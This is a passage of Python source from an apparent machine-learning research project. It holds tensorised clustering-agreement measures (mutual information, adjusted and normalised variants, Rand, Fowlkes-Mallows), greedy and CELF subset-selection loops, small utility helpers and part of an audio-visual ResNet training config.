N = self.cache['N'] # P x C x C
a = self.cache['a'] # P x C
b = self.cache['b'] # P x C
n = self.cache['n'] # P
S_ab = tensor_calc_combination(N, 2).sum(dim=[-1, -2]) # P
S_a = tensor_calc_combination(a, 2).sum(dim=-1) # P
S_b = tensor_calc_combination(b, 2).sum(dim=-1) # P
n = tensor_calc_combination(n, 2) # P
res = self._calc_pair_stats(S_ab, S_a, S_b, n)
for key in res.keys():
self.cache[key] = res[key]
def get_last(self):
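        # Note: unlike the base class, this multiplies the cached counts by the
        # one-hot candidate counts, so `last` holds per-candidate *increments* to
        # the pair statistics (e.g. N at the candidate's cell is the number of
        # newly created same-cluster pairs), not updated totals.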
last = {key: self.cache[key].unsqueeze(0) * self.candidates[key]
for key in self.candidates.keys()}
return last
def calc_pair_stats(self, last):
N = last['N'] # W x P x C x C
a = last['a'] # W x P x C
b = last['b'] # W x P x C
n = last['n'] # W x P
S_ab = N.sum(dim=[-1, -2]) # W x P
S_a = a.sum(dim=-1)
S_b = b.sum(dim=-1)
return self._calc_pair_stats(S_ab, S_a, S_b, n)
def _calc_pair_stats(self, S_ab, S_a, S_b, n):
S_aub = S_a + S_b - S_ab
res = {
'TP': S_ab,
'FP': S_a - S_ab,
'FN': S_b - S_ab,
'TN': n - S_aub
}
return res
def update_cache(self, last, idx):
for key in self.candidates.keys():
self.cache[key] += self.candidates[key][idx]
for key in self.temp_pair_stats.keys():
self.cache[key] += self.temp_pair_stats[key][idx]
del self.temp_pair_stats
self.pair_stats_sanity_check()
def pair_stats_sanity_check(self):
left_hand = sum([self.cache[key] for key in self.pair_stats]) # P
n = self.cache['n'] # P
right_hand = (n * (n - 1)) / 2 # P
assert (left_hand == right_hand).all(), "pair stats count error"
def _calc_score(self, *args, **kwargs):
return self.calc_pair_score(*args, **kwargs)
def calc_pair_score(self, last):
pair_stats = self.calc_pair_stats(last)
# W x P
self.temp_pair_stats = pair_stats
c = {p: self.cache[p].unsqueeze(0) + v for p, v in pair_stats.items()}
return self._calc_pair_score(c)
def _calc_pair_score(self, c):
return self.calc_FM(c)
def calc_FM(self, c):
FM = ((c['TP'] / (c['TP'] + c['FP'])) * (c['TP'] / (c['TP'] + c['FN']))).sqrt()
return FM
class RandScore(FowlkesMallowsScore):
def _calc_pair_score(self, c):
return self.calc_Rand(c)
def calc_Rand(self, c):
rand = (c['TP'] + c['TN']) / (c['TP'] + c['FP'] + c['FN'] + c['TN'])
return rand
class AdjustedRandScore(EfficientMI):
# TODO
def _calc_score(self, *args, **kwargs):
return self.calc_ARand(*args, **kwargs)
def calc_ARand(self, last):
N = last['N'] # W x P x C x C
a = last['a'] # W x P x C
b = last['b']
n = last['n'] # W x P
Nc = tensor_calc_combination(N, 2).sum(dim=[-1, -2])
ac = tensor_calc_combination(a, 2).sum(dim=-1)
bc = tensor_calc_combination(b, 2).sum(dim=-1)
nc = tensor_calc_combination(n, 2)
chance_term = (ac * bc) / nc
numerator = Nc - chance_term
denominator = 1 / 2 * (ac + bc) - chance_term
return numerator / denominator
```
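`FowlkesMallowsScore` and `RandScore` above are built from the usual pair counts (TP/FP/FN/TN over all sample pairs). A small sanity sketch on toy labelings, checking the same closed form against scikit-learn:
```python
# Pair-count sanity check on toy labels (not part of the project code).
import numpy as np
from scipy.special import comb
from sklearn.metrics import fowlkes_mallows_score

a = np.array([0, 0, 1, 1, 2])
b = np.array([0, 0, 1, 2, 2])

C = 3
N = np.zeros((C, C))
for x, y in zip(a, b):
    N[x, y] += 1
S_ab = comb(N, 2).sum()
S_a = comb(N.sum(1), 2).sum()
S_b = comb(N.sum(0), 2).sum()
n = comb(len(a), 2)

TP, FP, FN, TN = S_ab, S_a - S_ab, S_b - S_ab, n - (S_a + S_b - S_ab)
FM = np.sqrt((TP / (TP + FP)) * (TP / (TP + FN)))
print(np.isclose(FM, fowlkes_mallows_score(a, b)))  # True
```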
#### File: code/measures/efficient.py
```python
import copy
import time
from typing import List
from tqdm import tqdm
import torch
import numpy as np
from clustering import Clustering
# W: num_candidates, P: num_clustering_pairs, C: num_centroids
# N: (P x C X C), a: (P x C), b: (P x C), n: (P)
# WN: (W x P x C X C), Wa: (W x P x C), Wb: (W x P x C), wn: (W x P)
class EfficientMI:
""" this implementation requires the users to use the same ncentroids for all clusterings """
def __init__(self, clusterings: List[Clustering], measure_type='mutual_info',
average_method='arithmetic'):
self.average_method = average_method.lower()
self.clusterings = clusterings
self.ncentroids = clusterings[0].ncentroids
assignments = np.array([clustering.ind2cen for clustering in clusterings]) # D x V
self.assignments = torch.from_numpy(assignments).to(torch.long).t() # V x D
self.eps = np.finfo('float64').eps
def init(self, clustering_combinations, candidates):
if isinstance(clustering_combinations, dict):
self.combinations = clustering_combinations['pairing']
self.pair_weights = clustering_combinations['weights']
else:
self.combinations = clustering_combinations
self.init_cache()
self.init_candidates(candidates)
def get_N(self, assignments):
C = self.ncentroids
assignments = self.one_hot(assignments, C) # W x D x C
pair_ids = torch.LongTensor(self.combinations) # P x 2
assignments = assignments.to(self.device)
pair_ids = pair_ids.to(self.device)
p1 = self.gather_pairs(assignments, pair_ids[:, 0])
p2 = self.gather_pairs(assignments, pair_ids[:, 1]) # W x P x C
        N = torch.einsum('wpa,wpb->wpab', p1, p2)  # W x P x C x C
return N
def get_assignments(self, candidates):
candidates = torch.LongTensor(candidates) # W
assignments = self.assignments # V x D
assignments = assignments.index_select(dim=0, index=candidates)
return assignments
def init_cache(self):
P = len(self.combinations)
C = self.ncentroids
N = torch.full((P, C, C), self.eps)
a = N.sum(dim=1)
b = N.sum(dim=2)
n = a.sum(dim=-1)
self.cache = {'N': N, 'a': a, 'b': b, 'n': n}
def init_candidates(self, candidates):
self.candidate_ids = torch.LongTensor(candidates)
assignments = self.get_assignments(candidates)
N = self.get_N(assignments)
a = N.sum(2)
b = N.sum(3)
n = b.sum(-1)
self.candidates = {'N': N, 'a': a, 'b': b, 'n': n}
@staticmethod
def gather_pairs(assignments, idx):
W, _, C = assignments.shape
idx = idx.unsqueeze(0).unsqueeze(-1)
idx = idx.repeat(W, 1, C)
return assignments.gather(dim=1, index=idx) # W x P x C
@staticmethod
def one_hot(x, N, default=0, value=1):
dtype = torch.float
device = x.device
x_onehot = torch.full((*x.shape, N), default, dtype=dtype).to(device)
value = torch.full(x_onehot.shape, value, dtype=dtype).to(device)
x_onehot.scatter_(dim=-1, index=x.unsqueeze(-1), src=value)
return x_onehot
def calc_score(self, *args, **kwargs):
scores = self._calc_score(*args, **kwargs)
scores = scores.mean(dim=-1) # W
score, idx = scores.max(dim=0)
return score.item(), idx.item()
def _calc_score(self, *args, **kwargs):
scores = self.calc_MI(*args, **kwargs)
if hasattr(self, 'pair_weights'):
pair_weights = torch.tensor(self.pair_weights).float() # P
pair_weights = pair_weights.to(self.device)
scores = torch.einsum('wp,p->wp', scores, pair_weights)
return scores
def calc_MI(self, last):
N = last['N'] # W x P x C x C
a = last['a'].unsqueeze(2) # W x P x 1 x C
b = last['b'].unsqueeze(3)
n = last['n'].unsqueeze(-1).unsqueeze(-1)
scores = (N / n * (N.log() + n.log() - (a.log() + b.log()))).sum([2, 3]) # W x P
return scores
def get_last(self, candidates=None):
if candidates is None:
candidates = self.candidates
last = {key: self.cache[key].unsqueeze(0) + candidates[key]
for key in candidates.keys()}
return last
def update_cache(self, last, idx):
for key in last.keys():
self.cache[key] = last[key][idx]
def remove_idx_all(self, idx):
self.remove_idx('candidate_ids', idx)
self.remove_idx('candidates', idx)
def calc_measure(self, celf=False):
if celf:
return self.calc_measure_celf()
else:
return self.calc_measure_greedy()
def calc_measure_greedy(self):
last = self.get_last()
score, idx = self.calc_score(last)
candidate_idx = self.candidate_ids[idx].item()
self.update_cache(last, idx)
self.remove_idx_all(idx)
return score, candidate_idx, 1
def calc_measure_celf(self):
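        # Lazy-greedy (CELF) step: for submodular measures the marginal gain of a
        # candidate can only shrink as the subset grows, so only the current top
        # of the sorted queue is re-evaluated; it is accepted once it stays on
        # top after re-sorting, instead of re-scoring every remaining candidate.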
check, lookup = False, 0
if hasattr(self, 'candidate_ids'):
self.reverse_id_map = {v.item(): i for i, v in enumerate(list(self.candidate_ids))}
while not check:
lookup += 1
current = self.Q_idx[0]
current_gain, _ = self.calc_measure_single(current)
current_diff = current_gain - self.gain
self.Q_val[0] = current_diff
# Q = sorted(Q, key=lambda x: x[1], reverse=True)
self.Q_val, idx = self.Q_val.sort(descending=True)
self.Q_idx = self.Q_idx.index_select(dim=0, index=idx)
check = (self.Q_val[0] == current_diff) # tie
self.gain += self.Q_val[0]
s = self.Q_idx[0].item()
score = self.gain
self.Q_val = self.Q_val[1:]
self.Q_idx = self.Q_idx[1:]
reversed_id = self.reverse_id_map[s]
self.update_cache_celf(s)
self.remove_idx_all(reversed_id)
return score, s, lookup
def init_celf_q(self, prev_score):
self.Q_idx = copy.deepcopy(self.candidate_ids)
last = self.get_last()
scores = self._calc_score(last)
scores = scores.mean(dim=-1) # W
self.Q_val = scores
self.gain = prev_score
def calc_measure_single(self, current):
current = current.item()
if hasattr(self, 'reverse_id_map'):
idx = self.reverse_id_map[current]
else:
idx = current # alignment
candidate = {k: m[idx].unsqueeze(0) for k, m in self.candidates.items()}
last = self.get_last(candidate)
score, _ = self.calc_score(last)
return score, idx
def update_cache_celf(self, current):
if hasattr(self, 'reverse_id_map'):
idx = self.reverse_id_map[current]
else:
idx = current # alignment
candidate = {k: m[idx].unsqueeze(0) for k, m in self.candidates.items()}
last = self.get_last(candidate)
for key in last.keys():
self.cache[key] = last[key][0]
def remove_idx(self, name, idx):
if hasattr(self, name):
data = getattr(self, name)
if isinstance(data, dict):
data = {key: self._remove_idx(val, idx) for key, val in data.items()}
else:
data = self._remove_idx(data, idx)
setattr(self, name, data)
def _remove_idx(self, data, idx):
return torch.cat((data[:idx], data[idx + 1:]), dim=0)
def _add_samples(self, ids):
'''
assignments = torch.LongTensor([[c.get_assignment(x) for c in self.clusterings]
for x in ids]) # W x D
'''
C = self.clusterings[0].ncentroids
assignments = self.get_assignments(ids)
N_whole = self.get_N(assignments)
N = N_whole.sum(0) # P x C x C
a = N.sum(1) # P x C
b = N.sum(2)
n = b.sum(-1) # P
return {'N': N, 'a': a, 'b': b, 'n': n}
def add_samples(self, candidate_ids):
to_add = self._add_samples(candidate_ids)
for idx in candidate_ids:
self.remove_idx_all(idx)
for key in to_add.keys():
self.cache[key] += to_add[key]
'''
cand_ids = [self.candidates[idx] for idx in ids]
for idx in cand_ids:
# DEBUG: variable array length!
self.remove_idx_all(idx)
'''
def run_greedy(self, subset_size, start_indices, intermediate_target=None):
return self.run(subset_size, start_indices, intermediate_target, celf_ratio=0)
def run(self, subset_size, start_indices, intermediate_target=None, celf_ratio=0):
# celf_ratio = 0 -> full greedy
# greedy for the first (n_iters * (1 - celf_ratio)), celf for the rest
assert celf_ratio >= 0 and celf_ratio <= 1, 'invalid celf_ratio {}'.format(celf_ratio)
S = start_indices
GAIN = []
LOOKUPS = []
timelapse = []
self.add_samples(start_indices)
greedy_start_time = time.time()
start_time = time.time()
# start from empty index
iters = list(range(len(start_indices), subset_size - 1))
niters = len(iters)
greedy_niters = round(niters * (1 - celf_ratio))
greedy_iters = iters[:greedy_niters]
celf_iters = iters[greedy_niters:]
celf_niters = len(celf_iters)
print("niters: {} (greedy: {}, celf: {})".format(niters, greedy_niters,
celf_niters))
pbar = tqdm(greedy_iters, desc='greedy iter')
for j in pbar:
start_time = time.time()
score, idx, lookup = self.calc_measure(celf=False)
timelapse.append(time.time() - start_time)
S.append(idx)
GAIN.append(score)
LOOKUPS.append(lookup)
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), score, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), score))
if len(celf_iters) > 0:
prev_score = GAIN[-1] if len(GAIN) > 0 else 0
self.init_celf_q(prev_score)
pbar = tqdm(celf_iters, desc='celf iter')
for j in pbar:
start_time = time.time()
score, idx, lookup = self.calc_measure(celf=True)
timelapse.append(time.time() - start_time)
S.append(idx)
GAIN.append(score)
LOOKUPS.append(lookup)
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), score, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), score))
tqdm.write("Time Consumed: {} seconds".format(time.time() - greedy_start_time))
return (S, GAIN, timelapse, LOOKUPS)
def ensure_nonzero(self, x):
if torch.is_tensor(x):
x = torch.max(x, torch.full(x.shape, self.eps, dtype=x.dtype))
else:
x = max(x, self.eps)
return x
def generalized_mean(self, ha, hb):
if self.average_method == 'max':
normalizer = torch.max(ha, hb) # max avg
elif self.average_method == 'min':
normalizer = torch.min(ha, hb)
else:
# default is arithmetic
normalizer = (ha + hb) / 2 # arithmetic mean
return normalizer
class EfficientAMI(EfficientMI):
""" adjusted MI """
def _calc_score(self, *args, **kwargs):
return self.calc_AMI(*args, **kwargs)
def calc_EMI(self, last):
# maybe sklearn.metrics.cluster.expected_mutual_information?
# we need a way to 'DP' the factorials for faster computation
N = last['N'] # W x P x C x C
a = last['a'].unsqueeze(2) # W x P x 1 x C
b = last['b'].unsqueeze(3)
n = last['n'].unsqueeze(-1).unsqueeze(-1)
term1 = (N / n * (N.log() + n.log() - (a.log() + b.log())))
log_term2 = (a + 1).lgamma() + (b + 1).lgamma() + (n - a + 1).lgamma() + (n - b + 1).lgamma() \
- ((n + 1).lgamma() + (N + 1).lgamma() + (a - N + 1).lgamma() + (b - N + 1).lgamma()
+ (n - a - b + N + 1).lgamma())
scores = (term1 * log_term2.exp()).sum([2, 3])
return scores
@staticmethod
def calc_entropy(x, n):
p = x / n # W x P x C
return -(p * p.log()).sum(dim=-1)
def calc_entropies(self, last):
a = last['a'] # W x P x C
b = last['b'] # W x P x C
n = last['n'].unsqueeze(-1) # W x P x 1
ha = self.calc_entropy(a, n)
hb = self.calc_entropy(b, n)
return ha, hb
def calc_AMI(self, last):
mi = self.calc_MI(last)
emi = self.calc_EMI(last)
ha, hb = self.calc_entropies(last)
normalizer = self.generalized_mean(ha, hb)
denominator = normalizer - emi
'''
if denominator < 0:
denominator = min(denominator, -np.finfo('float64').eps)
else:
denominator = max(denominator, np.finfo('float64').eps)
'''
denominator = self.ensure_nonzero(denominator)
ami = (mi - emi) / denominator
return ami
class EfficientNMI(EfficientAMI):
def _calc_score(self, *args, **kwargs):
return self.calc_NMI(*args, **kwargs)
def calc_NMI(self, last):
mi = self.calc_MI(last)
ha, hb = self.calc_entropies(last)
normalizer = self.generalized_mean(ha, hb)
normalizer = self.ensure_nonzero(normalizer)
return (2 * mi) / normalizer
class ConstantMeasure(EfficientMI):
def _calc_score(self, *args, **kwargs):
return self.calc_constant(*args, **kwargs)
def calc_constant(self, last):
n = last['n'] # W x P
return torch.full_like(n, 1)
```
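`calc_MI` above evaluates mutual information directly from the running contingency table `N` and its marginals `a`, `b`, `n`. A small sanity sketch on toy labelings (clean counts, without the `eps` initialisation), checking the same formula against `sklearn.metrics.mutual_info_score`:
```python
# Contingency-table MI on toy labels (not part of the project code).
import numpy as np
from sklearn.metrics import mutual_info_score

x = np.array([0, 0, 1, 1, 2, 2])
y = np.array([0, 1, 1, 1, 2, 2])

C = 3
N = np.zeros((C, C))
for i, j in zip(x, y):
    N[i, j] += 1
a = N.sum(0, keepdims=True)  # column marginals
b = N.sum(1, keepdims=True)  # row marginals
n = N.sum()

with np.errstate(divide='ignore', invalid='ignore'):
    terms = N / n * (np.log(N) + np.log(n) - (np.log(a) + np.log(b)))
print(np.isclose(np.nansum(terms), mutual_info_score(x, y)))  # True
```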
#### File: code/measures/mutual_information.py
```python
from typing import List
from itertools import combinations
from collections import defaultdict
import numpy as np
import sklearn.metrics as metrics
from clustering import Clustering
MEASURES = {
"adjusted_rand": metrics.adjusted_rand_score,
"fowlkes_mallows": metrics.fowlkes_mallows_score,
"mutual_info": metrics.mutual_info_score,
"adjusted_mutual_info": metrics.adjusted_mutual_info_score, # equal to Normalized Variation of Information
"normalized_mutual_info": metrics.normalized_mutual_info_score,
}
class MutualInformation(object):
""" mean of pairwise mutual information """
def __init__(self, clusterings: List[Clustering], measure_type='mutual_info'):
self.nclusterings = len(clusterings)
self.clusterings = clusterings
self.measure_type = measure_type
self.measure = MEASURES[self.measure_type]
# self.measure_dict = defaultdict(lambda: 0)
'''
def init_count_dict(self):
clustering_indices = range(self.nclusterings) # do not use clustering_indices
clustering_combinations = combinations(clustering_indices, 2)
count_dict = {}
for tuple_indices in clustering_combinations:
idx = sorted(tuple_indices)
m = np.full((self.get_clustering(idx[0]).ncentroids,
self.get_clustering(idx[1]).ncentroids), self.eps)
dict_key = self.get_dict_key(tuple_indices)
count_dict[dict_key] = m
return count_dict
'''
def get_clustering(self, ind):
return self.clusterings[ind]
def get_assignment(self, indices, cluster_ind):
clustering = self.clusterings[cluster_ind]
return [clustering.get_assignment(ind) for ind in indices]
'''
def get_dict_key(self, tuple_indices):
key = tuple(tuple_indices)
key = str(sorted(key))
return key
def update_count(self, count_dict, tuple_indices, indices):
tuple_indices = sorted(tuple_indices)
dict_key = self.get_dict_key(tuple_indices)
for idx in indices:
c1 = self.get_clustering(tuple_indices[0])
c2 = self.get_clustering(tuple_indices[1])
a1 = c1.get_assignment(idx)
a2 = c2.get_assignment(idx)
count_dict[dict_key][a1, a2] += 1
return count_dict
'''
def get_combination(self):
clustering_indices = range(self.nclusterings)
group_size = 2
clustering_combinations = combinations(clustering_indices, group_size)
return clustering_combinations
def get_measure(self, indices, clustering_combinations=None, agreed_dict={}):
if clustering_combinations is None:
clustering_combinations = self.get_combination()
new_agreed_dict = {}
measures = []
for pair_indices in clustering_combinations:
indices1 = self.get_assignment(indices, pair_indices[0])
indices2 = self.get_assignment(indices, pair_indices[1])
measures.append(self.measure(indices1, indices2))
measure = sum(measures) / len(measures)
return measure, new_agreed_dict
'''
def calc_measure(self, count_dict, cluster_pair):
cluster_pair = sorted(cluster_pair)
dict_key = str(cluster_pair)
n = count_dict[dict_key]
N = n.sum()
a = n.sum(axis=0, keepdims=True)
b = n.sum(axis=1, keepdims=True)
measure = self.calc_func(n, a, b, N)
return measure
@staticmethod
def calc_MI(n, a, b, N):
return (n / N * (np.log(n * N) - np.log(a * b))).sum()
'''
def __call__(self, *args, **kwargs):
return self.get_measure(*args, **kwargs)
```
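`MutualInformation.get_measure` above simply averages a pairwise scikit-learn measure over all clustering pairs. A minimal usage sketch with toy assignment lists standing in for real `Clustering` objects:
```python
# Toy illustration of the pairwise averaging done by get_measure.
from itertools import combinations
import sklearn.metrics as metrics

assignments = [
    [0, 0, 1, 1],  # clustering 0
    [0, 1, 1, 1],  # clustering 1
    [1, 1, 0, 0],  # clustering 2
]
pairs = combinations(range(len(assignments)), 2)
scores = [metrics.mutual_info_score(assignments[i], assignments[j]) for i, j in pairs]
print(sum(scores) / len(scores))
```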
#### File: code/optimization/efficient.py
```python
import time
import random
from tqdm import tqdm
import numpy as np
def efficient_greedy(
measure,
dataset_size,
subset_size,
start_indices,
intermediate_target=None,
clustering_combinations=None,
celf_ratio=0,
verbose=True
):
candidates = list(set(range(dataset_size)) - set(start_indices))
random.shuffle(candidates)
if verbose:
print("initializing")
measure.init(clustering_combinations, candidates)
if verbose:
print("done initialization")
return measure.run(subset_size, start_indices, intermediate_target, celf_ratio)
```
#### File: code/optimization/greedy.py
```python
import time
import random
from tqdm import tqdm
import numpy as np
def greedy(
measure,
dataset_size,
subset_size,
start_indices,
intermediate_target=None,
clustering_combinations=None,
verbose=True
):
candidates = list(set(range(dataset_size)) - set(start_indices))
random.shuffle(candidates)
greedy_start_time = time.time()
start_time = time.time()
Q = [[c, None] for c in candidates]
S = start_indices
GAIN = []
LOOKUPS = []
timelapse = []
agreed_dict = {}
pbar = tqdm(range(len(start_indices), subset_size - 1), desc='greedy iter')
for j in pbar:
best_idx = -1
best_measure = -np.inf
for i in range(len(Q)):
current = Q[i][0]
current_measure, current_agreed_dict = measure(
S + [current], clustering_combinations=clustering_combinations,
agreed_dict=agreed_dict,
)
if current_measure > best_measure:
best_measure = current_measure
best_idx = i
best_agreed_dict = current_agreed_dict
agreed_dict = best_agreed_dict
S.append(Q[best_idx][0])
lookup = len(Q)
LOOKUPS.append(lookup)
GAIN.append(best_measure)
timelapse.append(time.time() - start_time)
del Q[best_idx]
'''
import copy
c = copy.deepcopy(agreed_dict['count']['[0, 1]'])
if c_prev is not None:
print(c - c_prev)
c_prev = c
'''
if intermediate_target is not None:
precision = len(set(intermediate_target) & set(S)) / len(set(S))
pbar.set_description("(LEN: {}, MEASURE: {}, PRECISION: {})".format(
len(S), best_measure, precision))
else:
pbar.set_description("(LEN: {}, MEASURE: {})".format(len(S), best_measure))
if verbose:
tqdm.write("Time Consumed: {} seconds".format(time.time() - greedy_start_time))
return (S, GAIN, timelapse, LOOKUPS)
```
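The loop above is the naive greedy baseline: it re-scores every remaining candidate at every step (on the order of subset_size x dataset_size measure calls), which is what the CELF path in `measures/efficient.py` avoids. A tiny self-contained sketch of the same greedy pattern with a toy coverage measure:
```python
# Toy greedy subset selection mirroring the loop above; the coverage
# "measure" over a made-up set family is purely illustrative.
sets = {0: {'a', 'b'}, 1: {'b', 'c'}, 2: {'d'}, 3: {'a', 'd', 'e'}}

def coverage(indices):
    return len(set().union(*(sets[i] for i in indices)))

S, candidates = [], list(sets.keys())
for _ in range(2):  # subset_size = 2
    best = max(candidates, key=lambda c: coverage(S + [c]))
    S.append(best)
    candidates.remove(best)
print(S, coverage(S))  # [3, 1] 5
```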
#### File: correspondence_retrieval/code/utils.py
```python
import os, contextlib
import pickle
from functools import reduce
from collections import defaultdict
def merge_dicts(li_of_dt):
if len(li_of_dt) == 0:
return {}
res = {}
for key in li_of_dt[0].keys():
res[key] = flatten_dt([v[key] for v in li_of_dt])
return res
def exchange_levels(dt):
# keys = peek(dt).keys()
res = defaultdict(dict)
for k1, lv1 in dt.items():
for k2, lv2 in lv1.items():
res[k2][k1] = lv2
return dict(res)
def flatten_dt(dt):
if isinstance(dt, dict):
return reduce(lambda x, y: {**x, **y}, dt.values())
else:
return reduce(lambda x, y: {**x, **y}, dt)
def peek(dt):
keys = list(dt.keys())
return dt[keys[0]]
def load_pickle(x):
with open(x, 'rb') as f:
x = pickle.load(f)
return x
def dump_pickle(data, path):
with open(str(path), 'wb') as f:
pickle.dump(data, f)
def supress_stdout(func):
def wrapper(*a, **ka):
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stdout(devnull):
func(*a, **ka)
return wrapper
def merge_dataset_model_name(dataset, model):
return "{}-{}".format(dataset, model)
def split_dataset_model_name(key):
names = key.split('-')
return names[0], '-'.join(names[1:])
def split_dataset_model_names(keys):
keys = [split_dataset_model_name(key) for key in keys]
res = defaultdict(list)
for dataset, model in keys:
res[dataset].append(model)
return dict(res)
```
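A few of the dict helpers above are easiest to read off a tiny example. The sketch below assumes the module is importable as `utils` and uses made-up inputs:
```python
# Made-up inputs illustrating the helpers defined above.
from utils import exchange_levels, flatten_dt, split_dataset_model_name

dt = {'layer_1': {'ucf': 1, 'esc': 2}, 'layer_2': {'ucf': 3, 'esc': 4}}
print(exchange_levels(dt))
# {'ucf': {'layer_1': 1, 'layer_2': 3}, 'esc': {'layer_1': 2, 'layer_2': 4}}

print(flatten_dt({'a': {'x': 1}, 'b': {'y': 2}}))
# {'x': 1, 'y': 2}

print(split_dataset_model_name('ucf101-resnet-50'))
# ('ucf101', 'resnet-50')
```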
#### File: evaluation/code/config.py
```python
import os
import argparse
from datetime import datetime
import torch
from pathlib import Path
"""Configs."""
from fvcore.common.config import CfgNode
import warnings
project_dir = str(Path(__file__).resolve().parent.parent)
dataset_root = os.path.join(project_dir, 'datasets')
output_root = os.path.join(project_dir, 'runs')
# -----------------------------------------------------------------------------
# Config definition
# -----------------------------------------------------------------------------
_C = CfgNode()
# ---------------------------------------------------------------------------- #
# Batch norm options
# ---------------------------------------------------------------------------- #
_C.BN = CfgNode()
# Weight decay value that applies on BN.
_C.BN.WEIGHT_DECAY = 0.0
# ---------------------------------------------------------------------------- #
# Pretraining options.
# ---------------------------------------------------------------------------- #
_C.PRETRAIN = CfgNode()
# Path to the checkpoint to load the pretrained weight.
_C.PRETRAIN.CHECKPOINT_FILE_PATH = ""
# Dataset.
_C.PRETRAIN.DATASET = "ACAV"
# Dataset size
_C.PRETRAIN.DATASET_SIZE = 100000000
# Total mini-batch size.
_C.PRETRAIN.BATCH_SIZE = 64
# Save model checkpoint every save period iterations
_C.PRETRAIN.SAVE_PERIOD = 500
# Save model checkpoint every `save_every_epoch` epochs
_C.PRETRAIN.SAVE_EVERY_EPOCH = 1
# PREEMPTIBLE
_C.PRETRAIN.PREEMPTIBLE = True
# ---------------------------------------------------------------------------- #
# Audio-Visual Contrastive Task options.
# ---------------------------------------------------------------------------- #
_C.CONTRAST = CfgNode()
# Projection size.
_C.CONTRAST.PROJECTION_SIZE = 128
# Softmax temperature
_C.CONTRAST.TEMPERATURE = 0.1
# Whether to use a global batch
_C.CONTRAST.USE_GLOBAL_BATCH = True
# ---------------------------------------------------------------------------- #
# Training options.
# ---------------------------------------------------------------------------- #
_C.TRAIN = CfgNode()
# If True Train the model, else skip training.
_C.TRAIN.ENABLE = True
# Dataset.
_C.TRAIN.DATASET = "UCF101"
# Dataset split.
_C.TRAIN.DATASET_SPLIT = 1
# Number of samples to sample from a data file.
_C.TRAIN.NUM_SAMPLES = 10
# Total mini-batch size.
_C.TRAIN.BATCH_SIZE = 64
# Evaluate model on validation data every eval period epochs.
_C.TRAIN.EVAL_PERIOD = 1
# Evaluate model on test data every test period epochs.
_C.TRAIN.TEST_PERIOD = 1
# Save model checkpoint every `save_every_epoch` epochs.
_C.TRAIN.SAVE_EVERY_EPOCH = 1
# Path to the checkpoint to load the initial weight.
_C.TRAIN.CHECKPOINT_FILE_PATH = ""
# PREEMPTIBLE
_C.TRAIN.PREEMPTIBLE = False
# ---------------------------------------------------------------------------- #
# Validation options
# ---------------------------------------------------------------------------- #
_C.VAL = CfgNode()
# If True validate the model, else skip the testing.
_C.VAL.ENABLE = False
# Dataset for validation.
_C.VAL.DATASET = "UCF101"
# Dataset split.
_C.VAL.DATASET_SPLIT = 1
# ---------------------------------------------------------------------------- #
# Testing options
# ---------------------------------------------------------------------------- #
_C.TEST = CfgNode()
# If True test the model, else skip the testing.
_C.TEST.ENABLE = False
# Dataset for testing.
_C.TEST.DATASET = "UCF101"
# Dataset split.
_C.TEST.DATASET_SPLIT = 1
# Total mini-batch size
_C.TEST.BATCH_SIZE = 64
# Path to the checkpoint to load the initial weight.
_C.TEST.CHECKPOINT_FILE_PATH = ""
# Number of samples to sample from a data file.
_C.TEST.NUM_SAMPLES = 30
# Number of samples to sample from a video uniformly for aggregating the
# prediction results.
_C.TEST.NUM_ENSEMBLE_VIEWS = 10
# Number of crops to sample from a frame spatially for aggregating the
# prediction results.
_C.TEST.NUM_SPATIAL_CROPS = 3
# -----------------------------------------------------------------------------
# Visual options
# -----------------------------------------------------------------------------
_C.VIS = CfgNode()
# Visual Model architecture.
_C.VIS.ARCH = "resnet"
# Visual Model name.
_C.VIS.MODEL_NAME = "ResNet"
# -----------------------------------------------------------------------------
# ResNet options
# -----------------------------------------------------------------------------
_C.RESNET = CfgNode()
# Transformation function.
_C.RESNET.TRANS_FUNC = "bottleneck_transform"
# Number of groups (1 for ResNet, and larger than 1 for ResNeXt).
_C.RESNET.NUM_GROUPS = 1
# Width of each group (64 -> ResNet; 4 -> ResNeXt).
_C.RESNET.WIDTH_PER_GROUP = 64
# Apply relu in a inplace manner.
_C.RESNET.INPLACE_RELU = True
# Apply stride to 1x1 conv.
_C.RESNET.STRIDE_1X1 = False
# Number of weight layers.
_C.RESNET.DEPTH = 50
# If the current block has more than NUM_BLOCK_TEMP_KERNEL blocks, use temporal
# kernel of 1 for the rest of the blocks.
_C.RESNET.NUM_BLOCK_TEMP_KERNEL = [[3], [4], [6], [3]]
# Size of stride on different res stages.
_C.RESNET.SPATIAL_STRIDES = [[1], [2], [2], [2]]
# Size of dilation on different res stages.
_C.RESNET.SPATIAL_DILATIONS = [[1], [1], [1], [1]]
# -----------------------------------------------------------------------------
# Audio options
# -----------------------------------------------------------------------------
_C.AUD = CfgNode()
# Audio Model architecture.
_C.AUD.ARCH = "resnet"
# Audio Model name
_C.AUD.MODEL_NAME = "AudioResNet"
# -----------------------------------------------------------------------------
# AudioResNet options
# -----------------------------------------------------------------------------
_C.AUDIO_RESNET = CfgNode()
# Transformation function.
_C.AUDIO_RESNET.TRANS_FUNC = "bottleneck_transform"
# Number of groups (1 for ResNet, and larger than 1 for ResNeXt).
_C.AUDIO_RESNET.NUM_GROUPS = 1
# Width of each group (32 -> ResNet; 4 -> ResNeXt).
_C.AUDIO_RESNET.WIDTH_PER_GROUP = 32
# Apply relu in a inplace manner.
_C.AUDIO_RESNET.INPLACE_RELU = True
# Apply stride to 1x1 conv.
_C.AUDIO_RESNET.STRIDE_1X1 = False
# Number of weight layers.
_C.AUDIO_RESNET.DEPTH = 50
# Size of stride on different res stages.
_C.AUDIO_RESNET.STRIDES = [2, 2, 2, 2]
# Size of dilation on different res stages.
_C.AUDIO_RESNET.DILATIONS = [1, 1, 1, 1]
# -----------------------------------------------------------------------------
# Model options
# -----------------------------------------------------------------------------
_C.MODEL = CfgNode()
# Downstream task.
_C.MODEL.TASK = "VisualClassify"
# The std to initialize the fc layer(s).
_C.MODEL.FC_INIT_STD = 0.01
# If true, initialize the gamma of the final BN of each block of ResNet to zero.
